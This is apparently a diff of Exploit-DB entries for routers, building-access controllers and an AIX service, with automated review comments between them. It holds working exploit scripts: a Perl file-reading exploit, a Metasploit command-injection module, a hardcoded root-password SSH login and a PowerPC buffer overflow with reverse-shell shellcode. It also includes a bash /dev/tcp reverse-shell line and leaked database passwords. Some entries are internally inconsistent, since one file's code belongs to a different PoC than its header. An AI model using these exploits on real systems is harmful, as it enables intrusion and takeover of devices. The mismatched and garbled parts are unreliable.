20\x62\x79\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x2e\x20\x54\x68\x65\x20\x61\x75\x74\x68\x6f\x72\x20\x6f\x72\x20\x61\x6e\x79\x20\x49\x6e\x74\x65\x72\x6e\x65\x74\x20\x70\x72\x6f\x76\x69\x64\x65\x72\x20\x0a\x5b\x20\x20\x62\x65\x61\x72\x73\x20\x4e\x4f\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x20\x66\x6f\x72\x20\x63\x6f\x6e\x74\x65\x6e\x74\x20\x6f\x72\x20\x6d\x69\x73\x75\x73\x65\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x0a\x5b\x20\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x6f\x72\x20\x61\x6e\x79\x20\x64\x65\x72\x69\x76\x61\x74\x69\x76\x65\x73\x20\x74\x68\x65\x72\x65\x6f\x66\x2e\x20\x42\x79\x20\x75\x73\x69\x6e\x67\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x20\x0a\x5b\x20\x20\x79\x6f\x75\x20\x61\x63\x63\x65\x70\x74\x20\x74\x68\x65\x20\x66\x61\x63\x74\x20\x74\x68\x61\x74\x20\x61\x6e\x79\x20\x64\x61\x6d\x61\x67\x65\x20\x28\x64\x61\x74\x61\x6c\x6f\x73\x73\x2c\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x72\x61\x73\x68\x2c\x20\x0a\x5b\x20\x20\x73\x79\x73\x74\x65\x6d\x20\x63\x6f\x6d\x70\x72\x6f\x6d\x69\x73\x65\x2c\x20\x65\x74\x63\x2e\x29\x20\x63\x61\x75\x73\x65\x64\x20\x62\x79\x20\x74\x68\x65\x20\x75\x73\x65\x20\x20\x6f\x66\x20\x74\x68\x65\x73\x65\x20\x70\x72\x6f\x67\x72\x61\x6d\x73\x0a\x5b\x20\x20\x61\x72\x65\x20\x6e\x6f\x74\x20\x54\x6f\x64\x6f\x72\x20\x44\x6f\x6e\x65\x76\x27\x73\x20\x72\x65\x73\x70\x6f\x6e\x73\x69\x62\x69\x6c\x69\x74\x79\x2e\x0a\x5b\x20\x20\x20\x0a\x5b\x20\x55\x73\x65\x20\x74\x68\x65\x6d\x20\x61\x74\x20\x79\x6f\x75\x72\x20\x6f\x77\x6e\x20\x72\x69\x73\x6b\x21\x0a\x5b\x0a";
print $banner;
print "[ e.g. perl $0 https://target:port/\n" and exit if ($host !~ m/^http/);
print "[ Initializing the browser\n";
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
$browser->timeout(30);
$browser->agent($user_agent);
my $target = $host."/cgi-bin/";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[ 401 Unauthorized!\n" and exit if ($response->code eq '401');
print "[ Server: ", $response->header('Server'), "\n";
if (defined ($response->as_string()) && ($response->as_string() =~ m/<H2>Index of \/cgi-bin\/<\/H2>/)){
print "[ The target is vulnerable\n";
print "[\n[ Directory Traversal\n";
my $tree = HTML::TreeBuilder->new_from_content($response->as_string());
my @files = $tree->look_down(_tag => 'a');
print "[ ", $_->attr('href'), "\n" for @files;
my $target = $host."/cgi-bin/getadslattr.cgi";
my $request = HTTP::Request->new (GET => $target,[Content_Type => "application/x-www-form-urlencoded",Referer => $host]);
my $response = $browser->request($request) or die "[ Exploit Failed: $!";
print "[\n[ File Reading\n";
print "[ ", $_, "\n" for split(/\n/,$response->content());
} else {
print "[ Exploit failed! The target isn't vulnerable\n";
exit;
}
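Review bot: the failure check `my $response = $browser->request($request) or die "[ Exploit Failed: $!";` never fires, because LWP::UserAgent->request always returns an HTTP::Response object (a connection error comes back as a synthesized 5xx response), so test `$response->is_success` and report `$response->status_line` instead; the same applies to the second request inside the if block, and `defined ($response->as_string())` is always true for the same reason. Also, `$target`, `$request` and `$response` are re-declared with `my` inside the if block, which under `use strict` and `-w` only yields "masks earlier declaration" warnings; drop the second set of `my`s. Smaller points: `$host."/cgi-bin/"` produces a double slash with the default `'https://192.168.1.1/'` (strip the trailing slash), the comment `# Full path url to the store` does not describe the argument, and the `$banner` hex blob encodes the same text as the comment header above it, so a plain heredoc would be readable and reviewable.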

exploits/hardware/remote/47442.py Executable file

File diff suppressed because it is too large

@ -0,0 +1,67 @@
During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And the other one is an improper access control found on the web server allowing to retrieve log files.
As usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to “responsible disclose” them.
The ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa.
Many thanks to Moxa and ICS-CERT teams for their help.
Advisory
The following two product vulnerabilities were identified in Moxa’s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable:
CVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. An authenticated attacker (with admin or configadmin privileges) can abuse the ping feature to execute commands on the router. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated.
CVE-2019-10963: An unauthenticated attacker can retrieve all the log files (Firewall, IPSec and System) from the webserver. In order to exploit the issue, a legitimate user had to export the log files previously. A CVSS v3 base score of 4.3 has been calculated.
Exploitation
CVE-2019-10969 - Ping Command Injection
The Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below:
Ping command injection
Due to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below:
bash -i >& /dev/tcp/YOUR_IP_ADDRESS/1234 0>&1
CVE-2019-10963 - Missing Access Control On Log Files
When a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow:
http://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz
An attacker can retrieve this archive without being authenticated on the Web interface as shown below:
# wget http://192.168.0.1/MOXA_All_LOG.tar.gz
--2019-02-13 17:35:19-- http://192.168.0.1/MOXA_All_LOG.tar.gz
Connexion à 192.168.0.1:80... connecté.
requête HTTP transmise, en attente de la réponse... 200 OK
Taille : 15724 (15K) [text/plain]
Sauvegarde en : " MOXA_All_LOG.tar.gz "
MOXA_All_LOG.tar.gz 100%[====================================================================================================================================>] 15,36K --.-KB/s ds 0s
2019-02-13 17:35:19 (152 MB/s) - " MOXA_All_LOG.tar.gz " sauvegardé [15724/15724]
# tar ztvf MOXA_All_LOG.tar.gz
drwxr-xr-x admin/root 0 2019-02-13 11:55 moxa_log_all/
-rw-r--r-- admin/root 326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini
-rw-r--r-- admin/root 156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini
-rw-r--r-- admin/root 68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini
Mitigation
It is recommended to install at least the firmware version 5.3 from Moxa website.
Timeline
2019-02-24: Vendor Disclosure
2019-02-24: Advisory sent to ICS-CERT
2019-09-30: Advisory published by Moxa
2019-10-01: Advisory published by ICS-CERT
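Review bot: the version range is inconsistent between the Advisory and the Mitigation: "all versions 5.1 and prior are vulnerable" versus "install at least the firmware version 5.3", which leaves 5.2 unaccounted for; state the first fixed release explicitly and whether it addresses both CVE-2019-10969 and CVE-2019-10963. The line "Ping command injection" under the first Exploitation subsection is a screenshot caption whose image is missing from this text copy, so either describe the CLI interaction in text or drop the dangling caption. Also, "When a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow:" is a sentence fragment (exports the log files ..., the files are stored ... as follows), and since the description says exported archives are stored at the web root, the Mitigation could also advise removing any previously exported MOXA_All_LOG.tar.gz after upgrading.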

@ -0,0 +1,310 @@
# Exploit Title: MikroTik RouterOS 6.45.6 - DNS Cache Poisoning
# Date: 2019-10-30
# Exploit Author: Jacob Baines
# Vendor Homepage: https://mikrotik.com/
# Software Link: https://mikrotik.com/download
# Version: 6.45.6 Stable (and below) or 6.44.5 Long-term (and below)
# Tested on: Various x86 and MIPSBE RouterOS installs
# CVE : CVE-2019-3978
# Writeup: https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
# Disclosure: https://www.tenable.com/security/research/tra-2019-46
# Unauthenticated DNS request via Winbox
# RouterOS before 6.45.7 (stable) and 6.44.6 (Long-term) allowed an unauthenticated remote user trigger DNS requests
# to a user specified DNS server via port 8291 (winbox). The DNS response then gets cached by RouterOS, setting up
# a perfect situation for unauthenticated DNS cache poisoning. This is assigned CVE-2019-3978.
# This PoC takes a target ip/port (router) and a DNS server (e.g. 8.8.8.8).
# The PoC will always send a DNS request for example.com. In the following write up,
# I detail how to use this to poison the routers cache:
# https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
# Note that the writup focuses on router's configured *without* the DNS server enabled.
# Obviously this attack is significantly more powerful when downstream clients use the router as a DNS server.
## What are the build dependencies?
# This requires:
# * Boost 1.66 or higher
# * cmake
## How do I build this jawn?
# Just normal cmake. Try this:
# ```sh
# mkdir build
# cd build
# cmake ..
# make
# ```
# Resolve dependencies as needed.
## Usage Example
# ```sh
# albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ./winbox_dns_request -i 192.168.1.50 -p 8291 -s 8.8.8.8
# -> {bff0005:1,u1:134744072,uff0006:1,uff0007:3,s3:'example.com',Uff0001:[14]}
# <- {u4:584628317,uff0003:2,uff0006:1,s3:'example.com',U6:[584628317],U7:[21496],Uff0001:[],Uff0002:[14],S5:['example.com']}
# albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ssh admin@192.168.1.50
# ...
# [admin@MikroTik] > ip dns cache print
# Flags: S - static
# # NAME ADDRESS TTL
# 0 example.com 93.184.216.34 5h57m57s
# [admin@MikroTik] >
# ```
# Source:
# https://github.com/tenable/routeros/tree/master/poc/winbox_dns_request
/*
Copyright 2019 Tenable, Inc. *
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
*/
#include <fstream>
#include <cstdlib>
#include <iostream>
#include <boost/cstdint.hpp>
#include <boost/program_options.hpp>
#include <boost/algorithm/string.hpp>
#include "winbox_session.hpp"
#include "winbox_message.hpp"
namespace
{
const char s_version[] = "CVE-2019-3943 PoC Using SNMP dlopen";
bool parseCommandLine(int p_argCount, const char* p_argArray[],
std::string& p_username, std::string& p_password,
std::string& p_ip, std::string& p_port)
{
boost::program_options::options_description description("options");
description.add_options()
("help,h", "A list of command line options")
("version,v", "Display version information")
("username,u", boost::program_options::value<std::string>(), "The user to log in as")
("password", boost::program_options::value<std::string>(), "The password to log in with")
("port,p", boost::program_options::value<std::string>()->default_value("8291"), "The Winbox port to connect to")
("ip,i", boost::program_options::value<std::string>(), "The IPv4 address to connect to");
boost::program_options::variables_map argv_map;
try
{
boost::program_options::store(
boost::program_options::parse_command_line(
p_argCount, p_argArray, description), argv_map);
}
catch (const std::exception& e)
{
std::cerr << e.what() << "\n" << std::endl;
std::cerr << description << std::endl;
return false;
}
boost::program_options::notify(argv_map);
if (argv_map.empty() || argv_map.count("help"))
{
std::cerr << description << std::endl;
return false;
}
if (argv_map.count("version"))
{
std::cerr << "Version: " << ::s_version << std::endl;
return false;
}
if (argv_map.count("username") && argv_map.count("ip") &
argv_map.count("port"))
{
p_username.assign(argv_map["username"].as<std::string>());
p_ip.assign(argv_map["ip"].as<std::string>());
p_port.assign(argv_map["port"].as<std::string>());
if (argv_map.count("password"))
{
p_password.assign(argv_map["password"].as<std::string>());
}
else
{
p_password.assign("");
}
return true;
}
else
{
std::cerr << description << std::endl;
}
return false;
}
}
int main(int p_argc, const char** p_argv)
{
std::string username;
std::string password;
std::string ip;
std::string port;
if (!parseCommandLine(p_argc, p_argv, username, password, ip, port))
{
return EXIT_FAILURE;
}
Winbox_Session winboxSession(ip, port);
if (!winboxSession.connect())
{
std::cerr << "Failed to connect to the remote host" << std::endl;
return EXIT_FAILURE;
}
boost::uint32_t p_session_id = 0;
if (!winboxSession.login(username, password, p_session_id))
{
std::cerr << "[-] Login failed." << std::endl;
return false;
}
WinboxMessage msg;
msg.set_to(0x4c);
msg.set_command(0xa0065);
msg.set_request_id(1);
msg.set_reply_expected(true);
msg.add_u32(5,80); // height
msg.add_u32(6,24); // width
msg.add_u32(8,1); // controls method. 0 (nova/bin/login), 1 (telnet), 2 (ssh), 3 (mactel), 4 (nova/bin/telser), default...
msg.add_string(0x0a, username); //username
msg.add_string(1,"");
msg.add_string(7, "vt102");
msg.add_string(9, "-l a"); // drop into telnet client shell
winboxSession.send(msg);
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
if (msg.has_error())
{
std::cout << "error: " << msg.get_error_string() << std::endl;
}
boost::uint32_t session_id = msg.get_u32(0xfe0001);
msg.reset();
msg.set_to(0x4c);
msg.set_command(0xa0068);
msg.set_request_id(2);
msg.set_reply_expected(true);
msg.add_u32(5,82);
msg.add_u32(6,24);
msg.add_u32(0xfe0001, session_id);
winboxSession.send(msg);
boost::uint32_t tracker = 0;
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
msg.reset();
msg.set_to(0x4c);
msg.set_command(0xa0067);
msg.set_request_id(3);
msg.set_reply_expected(true);
msg.add_u32(3, tracker);
msg.add_u32(0xfe0001, session_id);
winboxSession.send(msg);
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
if (msg.has_error())
{
std::cout << msg.serialize_to_json() << std::endl;
std::cout << "error: " << msg.get_error_string() << std::endl;
return EXIT_FAILURE;
}
else if (!msg.get_raw(0x02).empty())
{
std::string raw_payload(msg.get_raw(0x02));
tracker += raw_payload.size();
}
//{u3:1047,ufe0001:0,uff0007:655463,r2:[115],Uff0001:[76],Uff0002:[0,456]}
msg.reset();
msg.set_to(0x4c);
msg.set_command(0xa0067);
msg.set_request_id(4);
msg.set_reply_expected(true);
msg.add_u32(3, tracker);
msg.add_u32(0xfe0001, session_id);
msg.add_raw(2, "set tracefile /pckg/option\n");
winboxSession.send(msg);
bool found_telnet_prompt = false;
while (!found_telnet_prompt)
{
msg.reset();
if (!winboxSession.receive(msg))
{
std::cerr << "Error receiving a response." << std::endl;
return EXIT_FAILURE;
}
if (msg.has_error())
{
std::cout << msg.serialize_to_json() << std::endl;
std::cout << "error: " << msg.get_error_string() << std::endl;
return EXIT_FAILURE;
}
else if (!msg.get_raw(0x02).empty())
{
std::string raw_payload(msg.get_raw(0x02));
if (raw_payload.find("telnet> ") != std::string::npos)
{
std::cout << "Success!" << std::endl;
found_telnet_prompt = true;
}
}
}
return EXIT_SUCCESS;
}
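Review bot: the code body does not match the header or the usage example. The header describes an unauthenticated Winbox DNS request PoC for CVE-2019-3978 and the usage shows `./winbox_dns_request -i 192.168.1.50 -p 8291 -s 8.8.8.8`, but parseCommandLine defines no `-s` option and requires `--username` and `--ip`, `s_version` reads "CVE-2019-3943 PoC Using SNMP dlopen", and main logs in, opens a telnet session (`msg.set_command(0xa0065)` ... `msg.add_string(9, "-l a")`) and sends `set tracefile /pckg/option`, which is a different PoC altogether; the file should be replaced with the winbox_dns_request source at the "# Source:" URL. Two defects in what is there: `return false;` after a failed `winboxSession.login(...)` is inside `int main`, so a login failure exits with status 0; use `return EXIT_FAILURE;`. And `argv_map.count("username") && argv_map.count("ip") & argv_map.count("port")` mixes logical `&&` with bitwise `&`; it only works because count() returns 0 or 1, so write `&&`.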

@ -0,0 +1,48 @@
# Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 4.6.07
# Tested on: NA
# CVE : CVE-2019-7265
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
#!/usr/bin/env python
#
# ====
# python lineare3_sshroot.py 192.168.1.2
# [+] Connecting to 192.168.1.2 on port 22: Done
# [!] Only Linux is supported for ASLR checks.
# [*] root@192.168.1.2:
# Distro Unknown Unknown
# OS: Unknown
# Arch: Unknown
# Version: 0.0.0
# ASLR: Disabled
# Note: Susceptible to ASLR ulimit trick (CVE-2016-3672)
# [+] Opening new channel: 'shell': Done
# [*] Switching to interactive mode
# Last login: Fri Nov 1 04:21:44 2019 from 192.168.2.17
# root@imx6slevk:~# id
# uid=0(root) gid=0(root) groups=0(root)
# root@imx6slevk:~# pwd
# /home/root
# root@imx6slevk:~# exit
# logout
# [*] Got EOF while reading in interactive
# [*] Closed SSH channel with 192.168.1.2
# ====
from pwn import *
if len(sys.argv) < 2:
print 'Usage: ./e3.py <ip>\n'
sys.exit()
ip = sys.argv[1]
rshell = ssh('root', ip, password='davestyle', port=22)
rshell.interactive()
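Review bot: the `#!/usr/bin/env python` line sits after the Exploit-DB header block, so it is an ordinary comment rather than a shebang and the file cannot be executed directly; the shebang has to be line 1 (the EBBSHAVE entry below has the same layout). The usage string `'Usage: ./e3.py <ip>\n'` disagrees with the transcript's `python lineare3_sshroot.py 192.168.1.2`; pick one file name. The `print 'Usage: ...'` statement is Python 2 syntax, which should be stated in the header or changed to `print()`. Also "Date: 2018-11-11" looks like a typo for 2019-11-11: the transcript's last login is dated Nov 1 2019 and the companion Metasploit module gives 'DisclosureDate' => "Oct 29 2019".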

@ -0,0 +1,95 @@
# Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 4.6.07
# Tested on: NA
# CVE : CVE-2019-7265
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005
# Tested on: GNU/Linux 3.14.54 (ARMv7 rev 10), Lighttpd 1.4.40, PHP/5.6.23
#
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Linear eMerge E3 Access Controller Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in the Linear eMerge
E3 Access Controller. The issue is triggered by an unsanitized exec() PHP
function allowing arbitrary command execution with root privileges.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gjoko Krstic <gjoko@applied-risk.com> ' # Discovery, Exploit, MSF Module
],
'References' =>
[
[ 'URL', 'https://applied-risk.com/labs/advisories' ],
[ 'URL', 'https://www.nortekcontrol.com' ],
[ 'CVE', '2019-7256']
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
},
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' => [ ['Linear eMerge E3', { }], ],
'DisclosureDate' => "Oct 29 2019",
'DefaultTarget' => 0
)
)
end
def check
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "card_scan_decoder.php"),
'vars_get' =>
{
'No' => '251',
'door' => '1337'
}
})
if res.code == 200 and res.to_s =~ /PHP\/5.6.23/
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def http_send_command(cmd)
uri = normalize_uri(target_uri.path.to_s, "card_scan_decoder.php")
res = send_request_cgi({
'method' => 'GET',
'uri' => uri,
'vars_get' =>
{
'No' => '251',
'door' => "`"+cmd+"`"
}
})
unless res
fail_with(Failure::Unknown, 'Exploit failed!')
end
res
end
def exploit
http_send_command(payload.encoded)
print_status("Sending #{payload.encoded.length} byte payload...")
end
end
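Review bot: the CVE identifiers disagree: the header says `# CVE : CVE-2019-7265` while 'References' lists `[ 'CVE', '2019-7256']`; one of them is transposed and the module will be indexed under the wrong ID until it is fixed. In `check`, `res` is dereferenced without a nil guard (`if res.code == 200 and res.to_s =~ /PHP\/5.6.23/`), so an unreachable host raises NoMethodError instead of returning `CheckCode::Unknown`; and matching only the PHP version banner does not establish the injection, so `CheckCode::Detected` or `CheckCode::Appears` is the honest result rather than `Vulnerable`. `'Privileged' => false` contradicts the Description's "arbitrary command execution with root privileges"; set it to true. Minor: `print_status("Sending ...")` in `exploit` runs after the request has already gone out, and "Date: 2018-11-11" conflicts with `'DisclosureDate' => "Oct 29 2019"`.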

@ -0,0 +1,20 @@
# Exploit Title: CBAS-Web 19.0.0 - Information Disclosure
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 19.0.0
# Tested on: NA
# CVE : CVE-2019-10849
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep openssl
openssl enc -d -bf -pass pass:"WebAppEncoding7703" -in $FILE -out $filename.sql.gz
$ curl -s http://192.168.1.250/cbas/scripts/upgrade/restore_sql_db.sh | grep "\-\-password"
#for i in `mysql -B -u root --password="souper secrit" -e "show tables" wadb`; do
# mysql -u root --password="souper secrit" -e "describe $i" wadb;
mysql -u root --password="souper secrit" $DB < $filename.sql
$MYSQL -u root --password="souper secrit" -e "$SQL"
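Review bot: the entry has no Description or mitigation, only two curl transcripts, so the reader has to infer the issue; add a line stating that `/cbas/scripts/upgrade/restore_sql_db.sh` is served unauthenticated by the web server and embeds both a static encryption passphrase (`-pass pass:"WebAppEncoding7703"`) and the MySQL root password repeated on every `mysql -u root --password=...` line. The mitigation should also make clear that taking the script out of the served tree is not sufficient on its own, because the database root password and the backup passphrase it contains have to be treated as public and changed.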

exploits/hardware/remote/47888.py Executable file

@ -0,0 +1,256 @@
# Exploit Title: EBBISLAND EBBSHAVE 6100-09-04-1441 - Remote Buffer Overflow
# Date: 2018-09-19
# Exploit Author: Harrison Neal
# Vendor Homepage: https://www.ibm.com/us-en/
# Version: 6100-09-04-1441, 7100-03-05-1524, 7100-04-00-0000, 7200-01-01-1642
# Tested on: IBM AIX PPC
# CVE: CVE-2017-3623
# EBBISLAND / EBBSHAVE RPC Buffer Overflow for IBM AIX PPC
#!/usr/bin/python
# Usage: ebbshave-aixgeneric-v1.py rhost lhost lport gid_base execl_func execl_toc
# Exploit code example; shellcode requires /usr/bin/bash on the target
# Example values for my AIX 7.2 LPAR:
# gid_base: 3007d390
# execl_func: d0307940
# execl_toc: f081bc20
# CAUTION: If a RPC service repeatedly crashes, it can be automatically disabled
from os import urandom
from socket import socket, AF_INET, SOCK_STREAM
from struct import pack, unpack
from sys import argv, exit
from time import time, sleep
def getCredLoopbackBody():
global gid_base, rhost, lhost, lport, gid_base, execl_func, execl_toc
epoch = pack('>I', time()) # Make sure the system clock is in sync w/ target
# Doesn't matter, ljust call assumes len <= 4
node_name = 'hn'
node_length = pack('>I', len(node_name))
node_name = node_name.ljust(4, '\x00')
# Also doesn't matter
uid = pack('>I', 0)
gid = pack('>I', 0)
# Big enough to trigger an overflow
# Not big enough to trigger defensive code
# You could make this a little bit less,
# but you'd have to tweak the part 2 code
gids_len = pack('>I', 64)
base_addr = pack('>I', gid_base)
addr_8c = pack('>I', gid_base + 0x8c)
addr_a8 = pack('>I', gid_base + 0xa8)
addr_4c = pack('>I', gid_base + 0x4c)
func_addr = pack('>I', execl_func)
toc_addr = pack('>I', execl_toc)
cmd = 'bash -i >& /dev/tcp/' + lhost + '/' + lport + ' 0>&1'
cmd = cmd.ljust(0x30, '\x00')
# Each GID is 4 bytes long, we want 64
gids = (
# +0x0 # filepath
'/usr/bin/bash\x00\x00\x00'
# +0x10 # argv[0]
'bash\x00\x00\x00\x00'
# +0x18 # argv[1]
'-c\x00\x00'
# +0x1c # argv[2]
) + cmd + (
# +0x4c # r3 = filepath
'\x70\x63\x00\x00' # andi. r3, r3, 0x0
'\x3c\x60'
) + base_addr[0:2] + ( # lis r3, ...
'\x60\x63'
) + base_addr[2:4] + ( # ori r3, r3, ...
# +0x58 # r4 = argv[0]
'\x38\x83\x00\x10' # addi r4, r3, 0x10
# +0x5c # r5 = argv[1]
'\x38\xa4\x00\x08' # addi r5, r4, 0x8
# +0x60 # r6 = argv[2]
'\x38\xc5\x00\x04' # addi r6, r5, 0x4
# +0x64 # r7 = NULL
'\x70\xe7\x00\x00' # andi. r7, r7, 0x0
# +0x68 # r2 = libc.a TOC for execl
'\x70\x42\x00\x00' # andi. r2, r2, 0x0
'\x3c\x40'
) + toc_addr[0:2] + ( # lis r2, ...
'\x60\x42'
) + toc_addr[2:4] + ( # ori r2, r2, ...
# +0x74 # execl
'\x71\x08\x00\x00' # andi. r8, r8, 0x0
'\x3d\x00'
) + func_addr[0:2] + ( # lis r8, ...
'\x61\x08'
) + func_addr[2:4] + ( # ori r8, ...
'\x7d\x09\x03\xa6' # mtctr r8
'\x4e\x80\x04\x21' # bctrl
# +0x88 # 0x14 padding
'AAAAAAAAAAAAAAAAAAAA'
# +0x9c # Will be NULL
'ZZZZ'
# +0xa0
# @+948: r5 = +0x8c
# @+968: r5 = *(+0x8c + 0x18) = *(+0xa4)
# +0xa4
# @+968: r5 = +0xa8
# @+972: r0 = *(r5 + 0x0) = *(+0xa8)
# +0xa8
# @+972: r0 = +0x4c
# @+980: ctr = r0 = +0x4c
# @+988: branch to ctr
) + addr_8c + addr_a8 + addr_4c + (
# +0xac # padding
'BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB'
)
print ":".join("{:02x}".format(ord(c)) for c in gids)
print len(gids)
return epoch + node_length + node_name + uid + gid + gids_len + gids
def getCredLoopback():
cred_flavor = pack('>I', 0x55de) # AUTH_LOOPBACK
cred_body = getCredLoopbackBody()
cred_len = pack('>I', len(cred_body))
return cred_flavor + cred_len + cred_body
def getAuthNone():
auth_flavor = pack('>I', 0) # AUTH_NONE
auth_len = pack('>I', 0)
return auth_flavor + auth_len
def getMessage(prog_num, ver_num, proc_num, use_loopback_cred):
xid = urandom(4)
mtype = pack('>I', 0) # CALL
rpcvers = pack('>I', 2)
prog = pack('>I', prog_num)
vers = pack('>I', ver_num)
proc = pack('>I', proc_num)
cred = ( getCredLoopback() if use_loopback_cred else getAuthNone() )
verf = getAuthNone()
return xid + mtype + rpcvers + prog + vers + proc + cred + verf
def getPacket(message):
# MSB on = this is the last fragment
# LSBs = fragment length
frag = pack('>I', len(message) + 0x80000000)
return frag + message
if len(argv) < 7:
print 'Usage: ebbshave-aixgeneric-v1.py rhost lhost lport gid_base execl_func execl_toc'
exit(1)
rhost = argv[1]
lhost = argv[2]
lport = argv[3]
gid_base = int(argv[4], 16)
execl_func = int(argv[5], 16)
execl_toc = int(argv[6], 16)
# Query the portmapper for services
services = []
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, 111)) # port 111 for portmapper
s.send(getPacket(getMessage(
100000, # portmapper
2, # version 2
4, # DUMP
False # unauth request
)))
s.recv(0x1c) # skip over fragment length, XID, message type, reply state, verifier, accept state
while list(unpack('>I', s.recv(4)))[0]: # while next "value follows" field is true
prog_num, ver_num, proto_num, port = unpack('>IIII', s.recv(16))
if (prog_num == 100024 # status
and proto_num == 6): # TCP
print '[ ] Found service ' + str(prog_num) + ' v' + str(ver_num) + ' on TCP port ' + str(port)
services.append((prog_num, ver_num, port))
s.close()
# Try attacking
for service in services:
prog_num, ver_num, port = service
serv_str = str(prog_num) + ' v' + str(ver_num)
for attack in [False, True]:
sleep(1) # be gentle
